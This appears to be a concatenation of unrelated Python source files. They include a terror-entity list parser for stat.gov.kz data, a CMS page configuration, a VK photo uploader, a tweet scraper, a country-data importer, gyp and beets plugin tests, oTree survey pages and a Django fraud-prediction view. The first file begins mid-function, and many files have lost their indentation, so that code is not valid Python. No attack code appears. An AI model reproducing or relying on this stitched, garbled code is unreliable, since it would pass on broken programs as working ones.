local_filename = 'interprises_parsers/parsers/terror_entity/files/stat.gov.kz/' + filename
filename, file_extension = os.path.splitext(local_filename)
if file_extension in ['.zip', '.xls', '.xlsx']:
if not os.path.isfile(local_filename):
copyfile(temp_filename, local_filename)
print("copy file %s" % local_filename)
else:
print("%s file from %s is already here" % (local_filename, file_url))
os.remove(local_filename)
copyfile(temp_filename, local_filename)
print("copy file %s" % local_filename)
else:
print("%s file from %s unexpected extension" % (local_filename, file_url))
def convertFile():
terror_entity_folder = 'interprises_parsers/parsers/terror_entity/'
for filename in os.listdir(terror_entity_folder + 'files/stat.gov.kz'):
txt_name = terror_entity_folder + 'files/stat.gov.kz/' + filename.replace(".xlsx", ".txt").replace(".xls", ".txt")
if not os.path.isfile(txt_name):
from_excel_to_txt(terror_entity_folder + 'files/stat.gov.kz/' + filename)
print(filename + " was converted to txt")
logging.debug(filename + " was converted to txt")
terror_ids = []
with open('interprises_parsers/parsers/terror_entity/files/terror_entity.csv', 'w', encoding='UTF-8') as csvfile:
fieldnames = [
'number',
'name',
'birthday',
'iin',
'notes',
'notes_fix',
]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames, delimiter='\t', quotechar='"', escapechar='\\',
quoting=csv.QUOTE_NONNUMERIC, lineterminator='\n')
writer.writeheader()
for filename in os.listdir(terror_entity_folder + 'files/stat.gov.kz/'):
if ".txt" not in filename[-4:]:
continue
k = 0
with io.open(terror_entity_folder + 'files/stat.gov.kz/' + filename, 'r', encoding='UTF-8') as f:
for line in f:
v = line.split('\t')
values = []
for p in v:
values.append(prepare_string(p))
if(len(values) >= 8):
number = values[0]
if len(number) == 0:
number = None
name = values[1] + " " + values[2] + " " + values[3]
if len(name) == 0:
name = None
birthday = values[4]
if len(birthday) == 0:
birthday = None
iin = values[5]
if len(iin) == 0:
iin = None
notes = values[6]
if len(notes) == 0:
notes = None
notes_fix = values[7]
if len(notes_fix) == 0:
notes_fix = None
terror_ids.append((number))
writer.writerow({
'number': number,
'name': name,
'birthday': birthday,
'iin': iin,
'notes': notes,
'notes_fix': notes_fix
})
k = k + 1
copyfile(terror_entity_folder + 'files/' + "terror_entity.csv", "interprises_parsers/tmp/terror_entity.csv")
logging.info('files/' + "terror_entity.csv" + " was copied to interprises_parsers/tmp/ folder")
print('files/' + "terror_entity.csv" + " was copied to interprises_parsers/tmp/ folder")
def import_to_db():
try:
with connection.cursor() as cursor:
sqlfile = dir_path + "/import.sql"
for line in open(sqlfile, encoding='UTF-8'):
if len(line) == 0:
continue
cursor.execute(line)
result = cursor.fetchone()
connection.commit()
print("terror entites were imported to db")
except Exception as e:
print("import to db error: %s" % str(e))
finally:
connection.close()
download_file()
convertFile()
import_to_db()
|
from helpers.case.simcms.base_page import BasePage, BaseTabFields
from helpers.case.simcms.base_data import cms_page
from helpers.director.shortcut import director, ModelFields
import json
from . cms_pages import page1
class Home(BasePage):
def getTemplate(self):
return 'expo_cms/home.html'
def get_heads(self):
return [
{'name': 'hello', 'label': '汉化','editor': 'linetext',},
{'name': 'danyuan', 'label': '但愿','editor': 'linetext',}
]
def mergeCtx(self, par, ctx):
ctx['menu_lianjie'] = json.loads(ctx.get('menu_lianjie','[]'))
out = dict(par)
out.update(ctx)
if not ctx['menu_lianjie'] and par.get('menu_lianjie'):
out['menu_lianjie'] = par.get('menu_lianjie')
return out
def get_tabs(self):
baseinfo = BaseInfo(crt_user = self.request.user)
base2 = BaseInfo2(crt_user = self.request.user)
ls = [
{'name':'baseinfo',
'label':'基本信息',
'com':'com_tab_fields',
'get_data':{
'fun':'get_row',
'kws':{
'director_name':BaseInfo.get_director_name(),
'relat_field':'pk',
}
},
'after_save':{
#'fun':'update_or_insert'
#'fun':'do_nothing'
'fun':'update_par_row_from_db'
},
'heads': baseinfo.get_heads(),
'ops': baseinfo.get_operations()
},
#{'name':'baseinfo2',
#'label':'基本信息2',
#'com':'com_tab_fields',
#'get_data':{
#'fun':'get_row',
#'kws':{
#'director_name':base2.get_director_name(),
#'relat_field':'pk',
#}
#},
#'after_save':{
#'fun':'update_par_row_from_db'
#},
#'heads': base2.get_heads(),
#'ops': base2.get_operations()
#},
]
return ls
class BaseInfo(BaseTabFields):
def get_heads(self):
return [
{'name': 'slogan', 'label': '推广口号','editor': 'blocktext','style': 'width:30em;height:8em',},
{'name':'menu_lianjie','label':'导航栏链接','editor':'com-field-table-list',
'table_heads':[{'name':'url','label':'url','editor':'com-table-pop-fields-local'},
{'name':'label','label':'显示文字'},
{'name': 'op', 'label': '', 'editor': 'com-table-change-order',}],
'fields_heads':[{'name':'url','label':'url','editor':'linetext'},
{'name':'label','label':'显示文字','editor':'linetext'}]
}
]
#def get_heads(self):
#return [
#{'name': 'slogan', 'label': '推广口号','editor': 'blocktext','style': 'width:30em;height:8em',},
#{'name': 'danyuan', 'label': '但愿','editor': 'linetext',},
#{'name':'pp','label':'测试标签','editor':'com-field-table-list',
#'table_heads':[{'name':'a','label':'显示一','editor':'com-table-pop-fields-local'},
#{'name':'b','label':'显示二'},
#{'name': 'op', 'label': '', 'editor': 'com-table-change-order',}],
#'fields_heads':[{'name':'a','label':'显示一','editor':'linetext'},
#{'name':'b','label':'显示二','editor':'linetext'}]
#}
#]
class BaseInfo2(BaseTabFields):
def get_heads(self):
return [
{'name': 'bige', 'label': '逼格','editor': 'linetext',},
{'name': 'danyuan', 'label': '但愿','editor': 'linetext',}
]
director.update({
'simcms.page.home': Home,
'simcms.page.home.base': BaseInfo,
'simcms.page.home.base2': BaseInfo2,
})
cms_page.update({
'expo_cms_home': Home,
})
|
import json
from aiohttp import ClientSession
class PhotoUploader:
@staticmethod
async def get_server(api, peer_id: int) -> str:
server_data = await api.photos.get_messages_upload_server(peer_id=peer_id)
return server_data.response.upload_url
@staticmethod
async def request_text(method: str, url: str, data=None) -> str:
data = data or {}
        async with ClientSession() as session:
            async with session.request(method, url, data=data) as resp:
                return await resp.text()
async def upload(
self,
api,
upload_url: str,
file_data,
file_name=None,
file_extension=None,
):
file_name = file_name or "Photo"
file_extension = file_extension or "jpg"
if not hasattr(file_data, "name"):
try:
setattr(file_data, "name", f"{file_name}.{file_extension}")
except AttributeError:
raise RuntimeError(
"'bytes' object has no attribute 'name', put your bytes in BytesIO"
)
upload_data = json.loads(
await self.request_text(
method="POST", url=upload_url, data={"file1": file_data}
)
)
photo_sizes = (
await api.photos.save_messages_photo(
photo=upload_data["photo"],
server=upload_data["server"],
hash=upload_data["hash"],
)
).response
return photo_sizes
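# Illustrative usage sketch (the `api` object and the raw bytes are assumptions): wrap the bytes
# in BytesIO so the upload body carries a name attribute, as the check in upload() requires.
#
#     from io import BytesIO
#
#     uploader = PhotoUploader()
#     upload_url = await uploader.get_server(api, peer_id=2000000001)
#     photo_sizes = await uploader.upload(api, upload_url, BytesIO(raw_bytes), file_name="Photo")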
|
import re
words = []
with open('4news_dictionary.txt') as openfileobject:
for line in openfileobject:
obj = {}
obj["word"] = re.findall(r"\s+\d+\s+(\w+)", line)[0]
words.append(obj)
i=0
with open('p1.csv') as openfileobject:
for line in openfileobject:
matches = re.findall(r"(.+),(.+),(.+),(.+)", line)
words[i]["freq1"] = float(matches[0][0])
words[i]["freq2"] = float(matches[0][1])
words[i]["freq3"] = float(matches[0][2])
words[i]["freq4"] = float(matches[0][3])
i += 1
topic1 = sorted(words, key=lambda x: x["freq1"], reverse=True)
print "Words for topic 1 (the religion of CHRISTIANITY) : "
for i in xrange(0,10):
print "{} : {}".format(topic1[i]["word"], topic1[i]["freq1"])
print "\r\n\r\n"
topic2 = sorted(words, key=lambda x: x["freq2"], reverse=True)
print "Words for topic 2 (impact of diet on HEALTH) : "
for i in xrange(0,10):
print "{} : {}".format(topic2[i]["word"], topic2[i]["freq2"])
print "\r\n\r\n"
topic3 = sorted(words, key=lambda x: x["freq3"], reverse=True)
print "Words for topic 3 (INFORMATION SECURITY in modern democracies) :"
for i in xrange(0,10):
print "{} : {}".format(topic3[i]["word"], topic3[i]["freq3"])
print "\r\n\r\n"
topic4 = sorted(words, key=lambda x: x["freq4"], reverse=True)
print "Words for topic 4 (SPACE EXPLORATION and discoveries by Nasa) :"
for i in xrange(0,10):
print "{} : {}".format(topic4[i]["word"], topic4[i]["freq4"])
print "\r\n\r\n"
|
a = float(input('Enter the first side: '))
b = float(input('Enter the second side: '))
c = float(input('Enter the third side: '))
# triangle inequality: each side must be shorter than the sum of the other two
if a < b + c and b < a + c and c < a + b:
    print('These lengths can form a triangle')
    # equilateral = all sides equal
    # isosceles = exactly two sides equal
    # scalene = all sides different
    if a == b == c:
        print('Your triangle is equilateral')
    elif a == b or a == c or b == c:
        print('Your triangle is isosceles')
    else:
        print('Your triangle is scalene')
else:
    print('These lengths cannot form a triangle')
|
import os
import requests
from .models import Countries, NeighbourCountry
def get_country_info():
all_countries = {}
url = 'https://restcountries.eu/rest/v2/all'
response = requests.get(url)
data = response.json()
country_list = []
d = {}
for j in data:
key = j['alpha3Code']
value = j['name']
d[key] = value
s=0
for i in data:
l = []
s+=1
nc = i['borders']
        if nc:
            api_neighbour_name = ','.join(str(d[m]) for m in nc)
        else:
            api_neighbour_name = "NULL"
for j in i['languages']:
l.append(j['name'])
if l:
api_neighbour_languages = ','.join(l)
else:
api_neighbour_languages = "NULL"
country_data = Countries(
name=i['name'],
alphacode2=i['alpha2Code'],
capital=i['capital'],
population=i['population'],
timezone=' '.join(map(str, i['timezones'])),
flag_url=i['flag'],
)
country_data.save()
NeighbourCountry.objects.create(nname=api_neighbour_name,
nlanguages=api_neighbour_languages,ncountry_id =s
)
l.clear()
country_list.append(i)
# for im in data:
# nc = im['borders']
# border = Countries.objects.get(id=pk)
# if nc:
# for m in nc:
# neighbour_data = NeighbourCountry(border_country_name=str(d[m]))
# else:
# neighbour_data= NeighbourCountry(border_country_name="NULL")
# neighbour_data.save()
# for il in data:
# l = []
# for j in il['languages']:
# l.append(j['name'])
# if l:
# border_language_data = Languages(
# border_languages_list = ','.join(l)
# )
# l.clear()
# else:
# border_language_data = Languages(
# border_languages_list = "NULL"
# )
# border_language_data.save()
return country_list
|
print("This is hello")
|
import re, tweepy, datetime, time, json, csv
from tweepy import OAuthHandler
#Fetch only tweets whose creation time falls between startDate and endDate
startDate = datetime.datetime(2020, 1, 1, 0, 0, 0)
endDate = datetime.datetime(2020,12,1,0,0,0)
# keys and tokens from my Twitter Dev Console
access_token=""
access_token_secret=""
consumer_key=""
consumer_secret=""
# attempt authentication
try:
# create OAuthHandler object
auth = OAuthHandler(consumer_key, consumer_secret)
# set access token and secret
auth.set_access_token(access_token, access_token_secret)
# create tweepy API object to fetch tweets
api = tweepy.API(auth, wait_on_rate_limit=True)
#data = self.api.rate_limit_status()
print("Authentication Successfull")
except:
print("Error: Authentication Failed")
def clean_tweet(tweet):
'''
Utility function to clean tweet text by removing links, special characters
using simple regex statements.
'''
return str(' '.join(re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)", " ", tweet).split()))
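# For illustration: clean_tweet("Great quarter! https://t.co/abc #AMZN") strips the URL,
# punctuation and any @mentions, leaving roughly "Great quarter AMZN".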
def get_tweets(query, count, start):
'''
Main function to fetch tweets and parse them.
'''
# empty list to store tweets
tweets = []
# call twitter api to fetch tweets
    #Creates (or appends to) a CSV file and writes all the cleaned tweets to it
with open('Output.csv', 'a', encoding="utf8", newline='') as the_file:
fieldnames = ['text', 'date', 'number_of_retweet']
writer = csv.DictWriter(the_file, fieldnames=fieldnames)
writer.writerow({'text':'text', 'date':'date', 'number_of_retweet':'retweet_count'})
print("Fetching tweets.........")
for tweet in tweepy.Cursor(api.search, q=query, lang="en").items(count):
if tweet.created_at > startDate and tweet.created_at < endDate:
cleaned_tweet = clean_tweet(tweet.text)
if cleaned_tweet not in tweets:
tweets.append(cleaned_tweet)
writer.writerow({'text':cleaned_tweet, 'date':tweet.created_at, 'number_of_retweet':tweet.retweet_count})
the_file.close()
# returns the list of tweets
return tweets
#Calls the function by specifying keyword, number of tweets to be parsed from the API, and start date
Tweets = get_tweets(query = '$AMZN',count=20000, start=startDate)
print("Number of tweets fetched = ", len(Tweets))
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure paths are normalized with VS macros properly expanded on Windows.
"""
import TestGyp
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['ninja'])
test.run_gyp('normalize-paths.gyp')
# We can't use existence tests because any case will pass, so we check the
# contents of ninja files directly since that's what we're most concerned
# with anyway.
subninja = open(test.built_file_path('obj/some_target.ninja')).read()
if '$!product_dir' in subninja:
test.fail_test()
if 'out\\Default' in subninja:
test.fail_test()
second = open(test.built_file_path('obj/second.ninja')).read()
if ('..\\..\\things\\AnotherName.exe' in second or
'AnotherName.exe' not in second):
test.fail_test()
copytarget = open(test.built_file_path('obj/copy_target.ninja')).read()
if '$(VSInstallDir)' in copytarget:
test.fail_test()
action = open(test.built_file_path('obj/action.ninja')).read()
if '..\\..\\out\\Default' in action:
test.fail_test()
if '..\\..\\SomethingElse' in action or 'SomethingElse' not in action:
test.fail_test()
if '..\\..\\SomeOtherInput' in action or 'SomeOtherInput' not in action:
test.fail_test()
test.pass_test()
|
from otree.api import Currency as c, currency_range
from ._builtin import Page, WaitPage
from .models import Constants
# Expose variables to all templates. Attempted to write this as a prettier function, but was not able to.
def vars_for_all_templates(self):
return {
'lottery_a_hi': c(self.session.vars['payoffs']['A'][0]),
'lottery_a_lo': c(self.session.vars['payoffs']['A'][1]),
'lottery_b_hi': c(self.session.vars['payoffs']['B'][0]),
'lottery_b_lo': c(self.session.vars['payoffs']['B'][1]),
'num_choices': Constants.num_choices
}
# Class for the IntroPage. Inherits attributes from Page Class
class IntroPage(Page):
# Get forms to be displayed on IntroPage
form_model = 'player'
form_fields = ['name', 'risk']
# Class for the DecisionPage. Inherits attributes from Page Class
class DecisionPage(Page):
form_model = 'player'
# Unzip the list of choices, in order to create form fields corresponding to the number of choices
def get_form_fields(self):
form_fields = [list(t) for t in zip(*self.session.vars['choices'])][1]
print(form_fields)
return form_fields
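    # For illustration (the exact shape of session.vars['choices'] is an assumption): if choices
    # were [(1, 'choice_1'), (2, 'choice_2')], zip(*choices) regroups them into
    # [(1, 2), ('choice_1', 'choice_2')], and element [1] yields the form field names.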
# Expose variables that will only be available on this page.
def vars_for_template(self):
return {
"choices": self.session.vars['choices'],
}
# Triggers the function that set draws the payoff of the user before the user is taken to the result page. This
# should be changed if we were to make a game with several rounds.
def before_next_page(self):
self.player.set_payoffs()
# Class for the ResultsPage. Inherits attributes from Page Class
class ResultsPage(Page):
# Expose variables that will only be available on this page.
def vars_for_template(self):
return {
"index_to_pay": self.participant.vars['index_to_pay'],
}
# The sequence the app will order the pages.
page_sequence = [IntroPage, DecisionPage, ResultsPage]
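# Added illustration (not part of the original app; the pair contents below are hypothetical):
# the zip(*...) idiom used in DecisionPage.get_form_fields "unzips" a list of
# (label, field_name) pairs into parallel lists, so column 1 holds the form field names.
_example_choices = [('choice_1', 'risk_1'), ('choice_2', 'risk_2')]
_labels, _field_names = [list(t) for t in zip(*_example_choices)]
assert _field_names == ['risk_1', 'risk_2']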
|
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the 'beatport' plugin.
"""
import unittest
from test import _common
from test.helper import TestHelper
from datetime import timedelta
from beetsplug import beatport
from beets import library
class BeatportTest(_common.TestCase, TestHelper):
def _make_release_response(self):
"""Returns a dict that mimics a response from the beatport API.
The results were retrieved from:
https://oauth-api.beatport.com/catalog/3/releases?id=1742984
        The returned dict is incomplete, containing just the elements
        required by the tests in this class.
"""
results = {
"id": 1742984,
"type": "release",
"name": "Charade",
"slug": "charade",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"audioFormat": "",
"category": "Release",
"currentStatus": "General Content",
"catalogNumber": "GR089",
"description": "",
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
}
return results
def _make_tracks_response(self):
"""Return a list that mimics a response from the beatport API.
The results were retrieved from:
https://oauth-api.beatport.com/catalog/3/tracks?releaseId=1742984
        The returned list is incomplete, containing just the elements
        required by the tests in this class.
"""
results = [{
"id": 7817567,
"type": "track",
"sku": "track-7817567",
"name": "Mirage a Trois",
"trackNumber": 1,
"mixName": "Original Mix",
"title": "Mirage a Trois (Original Mix)",
"slug": "mirage-a-trois-original-mix",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"currentStatus": "General Content",
"length": "7:05",
"lengthMs": 425421,
"bpm": 90,
"key": {
"standard": {
"letter": "G",
"sharp": False,
"flat": False,
"chord": "minor"
},
"shortName": "Gmin"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
"release": {
"id": 1742984,
"name": "Charade",
"type": "release",
"slug": "charade"
},
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings",
"status": True
}
}, {
"id": 7817568,
"type": "track",
"sku": "track-7817568",
"name": "Aeon Bahamut",
"trackNumber": 2,
"mixName": "Original Mix",
"title": "Aeon Bahamut (Original Mix)",
"slug": "aeon-bahamut-original-mix",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"currentStatus": "General Content",
"length": "7:38",
"lengthMs": 458000,
"bpm": 100,
"key": {
"standard": {
"letter": "G",
"sharp": False,
"flat": False,
"chord": "major"
},
"shortName": "Gmaj"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
"release": {
"id": 1742984,
"name": "Charade",
"type": "release",
"slug": "charade"
},
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings",
"status": True
}
}, {
"id": 7817569,
"type": "track",
"sku": "track-7817569",
"name": "Trancendental Medication",
"trackNumber": 3,
"mixName": "Original Mix",
"title": "Trancendental Medication (Original Mix)",
"slug": "trancendental-medication-original-mix",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"currentStatus": "General Content",
"length": "1:08",
"lengthMs": 68571,
"bpm": 141,
"key": {
"standard": {
"letter": "F",
"sharp": False,
"flat": False,
"chord": "major"
},
"shortName": "Fmaj"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
"release": {
"id": 1742984,
"name": "Charade",
"type": "release",
"slug": "charade"
},
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings",
"status": True
}
}, {
"id": 7817570,
"type": "track",
"sku": "track-7817570",
"name": "A List of Instructions for When I'm Human",
"trackNumber": 4,
"mixName": "Original Mix",
"title": "A List of Instructions for When I'm Human (Original Mix)",
"slug": "a-list-of-instructions-for-when-im-human-original-mix",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"currentStatus": "General Content",
"length": "6:57",
"lengthMs": 417913,
"bpm": 88,
"key": {
"standard": {
"letter": "A",
"sharp": False,
"flat": False,
"chord": "minor"
},
"shortName": "Amin"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
"release": {
"id": 1742984,
"name": "Charade",
"type": "release",
"slug": "charade"
},
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings",
"status": True
}
}, {
"id": 7817571,
"type": "track",
"sku": "track-7817571",
"name": "The Great Shenanigan",
"trackNumber": 5,
"mixName": "Original Mix",
"title": "The Great Shenanigan (Original Mix)",
"slug": "the-great-shenanigan-original-mix",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"currentStatus": "General Content",
"length": "9:49",
"lengthMs": 589875,
"bpm": 123,
"key": {
"standard": {
"letter": "E",
"sharp": False,
"flat": True,
"chord": "major"
},
"shortName": "E♭maj"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
"release": {
"id": 1742984,
"name": "Charade",
"type": "release",
"slug": "charade"
},
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings",
"status": True
}
}, {
"id": 7817572,
"type": "track",
"sku": "track-7817572",
"name": "Charade",
"trackNumber": 6,
"mixName": "Original Mix",
"title": "Charade (Original Mix)",
"slug": "charade-original-mix",
"releaseDate": "2016-04-11",
"publishDate": "2016-04-11",
"currentStatus": "General Content",
"length": "7:05",
"lengthMs": 425423,
"bpm": 123,
"key": {
"standard": {
"letter": "A",
"sharp": False,
"flat": False,
"chord": "major"
},
"shortName": "Amaj"
},
"artists": [{
"id": 326158,
"name": "Supersillyus",
"slug": "supersillyus",
"type": "artist"
}],
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
"release": {
"id": 1742984,
"name": "Charade",
"type": "release",
"slug": "charade"
},
"label": {
"id": 24539,
"name": "Gravitas Recordings",
"type": "label",
"slug": "gravitas-recordings",
"status": True
}
}]
return results
def setUp(self):
self.setup_beets()
self.load_plugins('beatport')
self.lib = library.Library(':memory:')
# Set up 'album'.
response_release = self._make_release_response()
self.album = beatport.BeatportRelease(response_release)
# Set up 'tracks'.
response_tracks = self._make_tracks_response()
self.tracks = [beatport.BeatportTrack(t) for t in response_tracks]
# Set up 'test_album'.
self.test_album = self.mk_test_album()
# Set up 'test_tracks'
self.test_tracks = self.test_album.items()
def tearDown(self):
self.unload_plugins()
self.teardown_beets()
def mk_test_album(self):
items = [_common.item() for _ in range(6)]
for item in items:
item.album = 'Charade'
item.catalognum = 'GR089'
item.label = 'Gravitas Recordings'
item.artist = 'Supersillyus'
item.year = 2016
item.comp = False
item.label_name = 'Gravitas Recordings'
item.genre = 'Glitch Hop'
item.year = 2016
item.month = 4
item.day = 11
item.mix_name = 'Original Mix'
items[0].title = 'Mirage a Trois'
items[1].title = 'Aeon Bahamut'
items[2].title = 'Trancendental Medication'
items[3].title = 'A List of Instructions for When I\'m Human'
items[4].title = 'The Great Shenanigan'
items[5].title = 'Charade'
items[0].length = timedelta(minutes=7, seconds=5).total_seconds()
items[1].length = timedelta(minutes=7, seconds=38).total_seconds()
items[2].length = timedelta(minutes=1, seconds=8).total_seconds()
items[3].length = timedelta(minutes=6, seconds=57).total_seconds()
items[4].length = timedelta(minutes=9, seconds=49).total_seconds()
items[5].length = timedelta(minutes=7, seconds=5).total_seconds()
items[0].url = 'mirage-a-trois-original-mix'
items[1].url = 'aeon-bahamut-original-mix'
items[2].url = 'trancendental-medication-original-mix'
items[3].url = 'a-list-of-instructions-for-when-im-human-original-mix'
items[4].url = 'the-great-shenanigan-original-mix'
items[5].url = 'charade-original-mix'
counter = 0
for item in items:
counter += 1
item.track_number = counter
items[0].bpm = 90
items[1].bpm = 100
items[2].bpm = 141
items[3].bpm = 88
items[4].bpm = 123
items[5].bpm = 123
items[0].initial_key = 'Gmin'
items[1].initial_key = 'Gmaj'
items[2].initial_key = 'Fmaj'
items[3].initial_key = 'Amin'
items[4].initial_key = 'E♭maj'
items[5].initial_key = 'Amaj'
for item in items:
self.lib.add(item)
album = self.lib.add_album(items)
album.store()
return album
# Test BeatportRelease.
def test_album_name_applied(self):
self.assertEqual(self.album.name, self.test_album['album'])
def test_catalog_number_applied(self):
self.assertEqual(self.album.catalog_number,
self.test_album['catalognum'])
def test_label_applied(self):
self.assertEqual(self.album.label_name, self.test_album['label'])
def test_category_applied(self):
self.assertEqual(self.album.category, 'Release')
def test_album_url_applied(self):
self.assertEqual(self.album.url,
'https://beatport.com/release/charade/1742984')
# Test BeatportTrack.
def test_title_applied(self):
for track, test_track in zip(self.tracks, self.test_tracks):
self.assertEqual(track.name, test_track.title)
def test_mix_name_applied(self):
for track, test_track in zip(self.tracks, self.test_tracks):
self.assertEqual(track.mix_name, test_track.mix_name)
def test_length_applied(self):
for track, test_track in zip(self.tracks, self.test_tracks):
self.assertEqual(int(track.length.total_seconds()),
int(test_track.length))
def test_track_url_applied(self):
# Specify beatport ids here because an 'item.id' is beets-internal.
ids = [
7817567,
7817568,
7817569,
7817570,
7817571,
7817572,
]
# Concatenate with 'id' to pass strict equality test.
for track, test_track, id in zip(self.tracks, self.test_tracks, ids):
self.assertEqual(
track.url, 'https://beatport.com/track/' +
test_track.url + '/' + str(id))
def test_bpm_applied(self):
for track, test_track in zip(self.tracks, self.test_tracks):
self.assertEqual(track.bpm, test_track.bpm)
def test_initial_key_applied(self):
for track, test_track in zip(self.tracks, self.test_tracks):
self.assertEqual(track.initial_key, test_track.initial_key)
def test_genre_applied(self):
for track, test_track in zip(self.tracks, self.test_tracks):
self.assertEqual(track.genre, test_track.genre)
class BeatportResponseEmptyTest(_common.TestCase, TestHelper):
def _make_tracks_response(self):
results = [{
"id": 7817567,
"name": "Mirage a Trois",
"genres": [{
"id": 9,
"name": "Breaks",
"slug": "breaks",
"type": "genre"
}],
"subGenres": [{
"id": 209,
"name": "Glitch Hop",
"slug": "glitch-hop",
"type": "subgenre"
}],
}]
return results
def setUp(self):
self.setup_beets()
self.load_plugins('beatport')
self.lib = library.Library(':memory:')
# Set up 'tracks'.
self.response_tracks = self._make_tracks_response()
self.tracks = [beatport.BeatportTrack(t) for t in self.response_tracks]
# Make alias to be congruent with class `BeatportTest`.
self.test_tracks = self.response_tracks
def tearDown(self):
self.unload_plugins()
self.teardown_beets()
def test_response_tracks_empty(self):
response_tracks = []
tracks = [beatport.BeatportTrack(t) for t in response_tracks]
self.assertEqual(tracks, [])
def test_sub_genre_empty_fallback(self):
"""No 'sub_genre' is provided. Test if fallback to 'genre' works.
"""
self.response_tracks[0]['subGenres'] = []
tracks = [beatport.BeatportTrack(t) for t in self.response_tracks]
self.test_tracks[0]['subGenres'] = []
self.assertEqual(tracks[0].genre,
self.test_tracks[0]['genres'][0]['name'])
def test_genre_empty(self):
"""No 'genre' is provided. Test if 'sub_genre' is applied.
"""
self.response_tracks[0]['genres'] = []
tracks = [beatport.BeatportTrack(t) for t in self.response_tracks]
self.test_tracks[0]['genres'] = []
self.assertEqual(tracks[0].genre,
self.test_tracks[0]['subGenres'][0]['name'])
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
from django.shortcuts import render
import joblib
import os
from pathlib import Path
import numpy as np
import requests
import json
#-----------------------------------------------------------------------
# Loading model at runtime
base_dir = Path(__file__).resolve(strict=True).parent.parent
model = os.path.join(base_dir, 'model.pkl')
joblib_model = joblib.load(model)
#-----------------------------------------------------------------------
# Views
def home(request):
txt = "-0.35318941, 0.92823624, -1.29844323, 1.94810045, -4.50994689, 1.30580477, -0.01948593, -0.50923778, -2.64339762, 1.28354519, -2.5153557 , -4.50131481, 2.09307501, -5.41888894, -1.24701371, -3.82826818, 0.39905034, -6.36649951, -7.55096809, -4.90276667, 0.15289203, 0.25041544, 1.17803195, 1.36098858, -0.27201306, -0.3259479 , 0.29070267, 0.84129459, 0.64309425, 0.20115575"
context = {'preds':'', 'txt':txt}
return render(request, 'cardfraud/base.html', context)
def predict_view(request):
result = -1
preds = ''
data = request.GET.get('data')
if request.method == 'GET':
try:
            test = np.fromstring(data[1:-1], dtype=float, sep=',')
test = test.reshape(1, -1)
result = joblib_model.predict(test)
if result == 0:
preds = 'Not Fraud'
elif result == 1:
preds= 'Fraud'
else:
preds = 'Not available'
except ValueError:
preds = 'Please, enter correct array data - 30 features'
context = {'preds':preds, 'txt':data}
return render(request, 'cardfraud/base.html', context)
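# Example query for predict_view (added illustration; the URL route name is hypothetical
# and depends on the project's URLconf):
#   GET /predict/?data=[-0.35, 0.92, ..., 0.20]
# The value must be a bracketed list of 30 comma-separated floats, matching the
# data[1:-1] slicing and the 30-feature expectation above.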
def predict_using_api(request):
array_data = request.GET.get('data')
json_data = {"array_data" : array_data}
preds = requests.post('http://127.0.0.1:8000/api/get_preds_api/', json=json_data).json()
context = {'preds':preds, 'txt':array_data}
return render(request, 'cardfraud/base.html', context)
def notebook(request):
return render(request, 'cardfraud/notebook.html', {})
|
